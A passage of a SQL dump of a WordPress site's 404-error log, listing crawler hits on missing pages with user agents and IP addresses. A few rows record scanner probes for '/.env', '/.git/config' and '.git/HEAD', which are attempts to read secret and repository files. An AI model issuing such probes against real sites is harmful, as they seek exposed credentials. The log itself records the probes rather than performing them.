/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_404` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `created` datetime NOT NULL,
  `url` mediumtext NOT NULL,
  `domain` varchar(255) DEFAULT NULL,
  `agent` varchar(255) DEFAULT NULL,
  `referrer` varchar(255) DEFAULT NULL,
  `http_code` int(11) unsigned NOT NULL DEFAULT 0,
  `request_method` varchar(10) DEFAULT NULL,
  `request_data` mediumtext DEFAULT NULL,
  `ip` varchar(45) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `created` (`created`),
  KEY `referrer` (`referrer`(191)),
  KEY `ip` (`ip`)
) ENGINE=InnoDB AUTO_INCREMENT=38122 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_redirection_404`
--

LOCK TABLES `wp_redirection_404` WRITE;
/*!40000 ALTER TABLE `wp_redirection_404` DISABLE KEYS */;
INSERT INTO `wp_redirection_404` VALUES (36558,'2023-01-24 10:39:17','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36559,'2023-01-24 10:50:29','/chaparajos/aesg8r3e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36560,'2023-01-24 10:51:09','/w53g0r2f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.42'),(36561,'2023-01-24 11:08:48','/akbh4pkg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36562,'2023-01-24 11:29:43','/macrochires/9ont3h5e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36563,'2023-01-24 11:34:41','/catalytic-clothing-style-with-substance','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36564,'2023-01-24 11:37:58','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/10.0.4 Mobile/15E148 Safari/604.1','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36565,'2023-01-24 11:51:04','/wr45rdqe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.195'),(36566,'2023-01-24 11:53:07','/wp-content/plugins/elementor/readme.txt','https://www.dailyjolly.co.uk','Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0','www.google.com',404,'GET',NULL,'163.47.158.58'),(36567,'2023-01-24 12:01:36','/idolum/w3r8q1kg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36568,'2023-01-24 12:13:47','/fencing/dph4ao2f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36569,'2023-01-24 12:15:45','/tamarix/wh4w6w5f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',NULL,404,'GET',NULL,'40.77.167.46'),(36570,'2023-01-24 12:21:31','/isf55u1e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.195'),(36571,'2023-01-24 12:31:26','/kqccr3lf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.195'),(36572,'2023-01-24 12:34:26','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/101.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36573,'2023-01-24 12:46:28','/rel/uk/en-010-014205103','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'87.250.224.89'),(36574,'2023-01-24 12:54:09','/fagi/9b8cehng2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36575,'2023-01-24 12:54:11','/1m7sosvf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36576,'2023-01-24 12:55:30','/.git/config','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',NULL,404,'GET',NULL,'139.59.146.77'),(36577,'2023-01-24 12:57:37','/t2og56je2','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',NULL,404,'GET',NULL,'40.77.167.58'),(36578,'2023-01-24 13:12:51','/group-zgltbWluZw7.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.42'),(36579,'2023-01-24 13:25:30','/w15hmesg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.195'),(36580,'2023-01-24 13:26:51','/dovmqc7f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36581,'2023-01-24 13:31:16','/reoppose50/imfeoijd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',NULL,404,'GET',NULL,'40.77.167.46'),(36582,'2023-01-24 13:40:51','/dop8jw1f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36583,'2023-01-24 13:54:00','/a0fcpa8e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.195'),(36584,'2023-01-24 14:02:18','/onos/1y25ptkd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.42'),(36585,'2023-01-24 14:07:46','/advice/cry-y3j5ch/193fedor','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.42'),(36586,'2023-01-24 14:31:46','/d9e0cm5e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36587,'2023-01-24 14:37:52','/i2zgv25e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.195'),(36588,'2023-01-24 14:48:56','/tezevw1f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36589,'2023-01-24 14:56:21','/iwiikzce2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36590,'2023-01-24 14:57:10','/gouge/imp0659g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.42'),(36591,'2023-01-24 14:58:49','/beretta4/dw5pg6jd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.195'),(36592,'2023-01-24 15:08:52','/advice/statio1','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36593,'2023-01-24 15:32:09','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36594,'2023-01-24 15:40:45','/inconceptible/1grpqbqe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.42'),(36595,'2023-01-24 15:42:44','/d26a4n4e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36596,'2023-01-24 15:49:02','/spinnies/w3faay3g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36597,'2023-01-24 15:59:10','/hydrostat5/k2bpvq6h2','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',NULL,404,'GET',NULL,'40.77.167.58'),(36598,'2023-01-24 16:07:25','/be/1q58g93e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36599,'2023-01-24 16:25:27','/kws0rc3g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36600,'2023-01-24 16:38:32','/dovfavbf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.42'),(36601,'2023-01-24 16:40:32','/92f6fpfe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'13.66.139.6'),(36602,'2023-01-24 16:56:12','/diaphoretical/toiy6p8e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36603,'2023-01-24 16:57:19','/fasciata/9bm6ngyf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36604,'2023-01-24 17:06:12','/ads.txt','https://www.dailyjolly.co.uk','Google-adstxt',NULL,404,'GET',NULL,'66.249.76.95'),(36605,'2023-01-24 17:08:41','/t3hcsorf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.195'),(36606,'2023-01-24 17:10:05','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/82.0.1055.1 Safari/535.24','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36607,'2023-01-24 17:10:52','/aquatilis/tezaamze2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36608,'2023-01-24 17:35:57','/segmentation/aqiba5ze2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.42'),(36609,'2023-01-24 17:49:06','/detdi63g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36610,'2023-01-24 17:54:17','/bathometer/tkprkhkd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36611,'2023-01-24 18:23:14','/personal-services/.git/HEAD','https://www.dailyjolly.co.uk','RepoLookoutBot/v1.1.0-3-g1e52068 (abuse reports to abuse@repo-lookout.org)','http://www.dailyjolly.co.uk/personal-services/.git/HEAD',404,'GET',NULL,'3.72.74.40'),(36612,'2023-01-24 18:23:27','/page/.git/HEAD','https://www.dailyjolly.co.uk','RepoLookoutBot/v1.1.0-3-g1e52068 (abuse reports to abuse@repo-lookout.org)','http://www.dailyjolly.co.uk/page/.git/HEAD',404,'GET',NULL,'3.72.74.40'),(36613,'2023-01-24 18:23:40','/adult-web-cams/.git/HEAD','https://www.dailyjolly.co.uk','RepoLookoutBot/v1.1.0-3-g1e52068 (abuse reports to abuse@repo-lookout.org)','http://www.dailyjolly.co.uk/adult-web-cams/.git/HEAD',404,'GET',NULL,'3.72.74.40'),(36614,'2023-01-24 18:33:59','/pistia/iee76txe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36615,'2023-01-24 18:34:31','/expectedly/kq7bwzfe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.42'),(36616,'2023-01-24 18:48:11','/broadcast-cmvndWxhcg3.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.195'),(36617,'2023-01-24 18:49:28','/macrochires/9ont3h5e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36618,'2023-01-24 18:50:54','/keynote/microg21','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36619,'2023-01-24 19:02:32','/knowledge-aw1tZWRpYXRlbHk6.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36620,'2023-01-24 19:06:08','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.70.254'),(36621,'2023-01-24 19:11:23','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36622,'2023-01-24 19:16:17','/bashless13/imoq5fkd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.195'),(36623,'2023-01-24 19:23:06','/iss6gqjd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36624,'2023-01-24 19:39:21','/holocaust/tbjv2mkd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.42'),(36625,'2023-01-24 19:39:40','/solutive4/9racmt2h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36626,'2023-01-24 19:42:17','/collection/b21wagfsb3rvbxk-47','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',NULL,404,'GET',NULL,'40.77.167.60'),(36627,'2023-01-24 19:48:41','/ts4dns4e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36628,'2023-01-24 19:51:42','/tnul255e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36629,'2023-01-24 19:59:19','/9fj9ax6e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36630,'2023-01-24 20:05:47','/aurvajse2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.42'),(36631,'2023-01-24 20:10:47','/.env','https://dailyjolly.co.uk','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36',NULL,404,'POST',NULL,'109.237.98.53'),(36632,'2023-01-24 20:14:00','/tkes342h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36633,'2023-01-24 20:21:54','/debarking/a4bf3vkd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36634,'2023-01-24 20:28:27','/bugled/iemh86jd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36635,'2023-01-24 20:36:32','/notice/ZmVycnk-67','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36636,'2023-01-24 20:47:58','/page/5','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64; trendictionbot0.5.0; trendiction search; http://www.trendiction.de/bot; please let us know of any problems; web at trendiction.com) Gecko/20170101 Firefox/67.0',NULL,404,'GET',NULL,'144.76.22.15'),(36637,'2023-01-24 21:11:05','/iy2xs1hf2','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',NULL,404,'GET',NULL,'40.77.167.60'),(36638,'2023-01-24 21:11:48','/t39co33e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36639,'2023-01-24 21:23:48','/ventriloquist/wzsjurnf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.42'),(36640,'2023-01-24 21:37:40','/9ffypb7e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36641,'2023-01-24 21:49:30','/peterel/tevdoalg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36642,'2023-01-24 21:54:41','/isy1at1e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36643,'2023-01-24 21:58:40','/gentlewoman/dopvx0de2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36644,'2023-01-24 22:08:43','/notwithstanding1/imofhbde2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36645,'2023-01-24 22:13:11','/neutering1/dwrc95be2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36646,'2023-01-24 22:13:23','/9ofqs1vg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36647,'2023-01-24 22:30:17','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 13_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.4.4 Mobile/15E148 Safari/604.1','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36648,'2023-01-24 22:33:47','/corpusculous/1dcasoqe2','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',NULL,404,'GET',NULL,'40.77.167.46'),(36649,'2023-01-24 22:52:43','/18kk8fse2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36650,'2023-01-24 22:54:14','/9r8rp9ge2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36651,'2023-01-24 22:55:47','/carriboo/1dm3qc1f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36652,'2023-01-24 23:13:27','/dtijxm6e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36653,'2023-01-24 23:15:56','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:103.0) 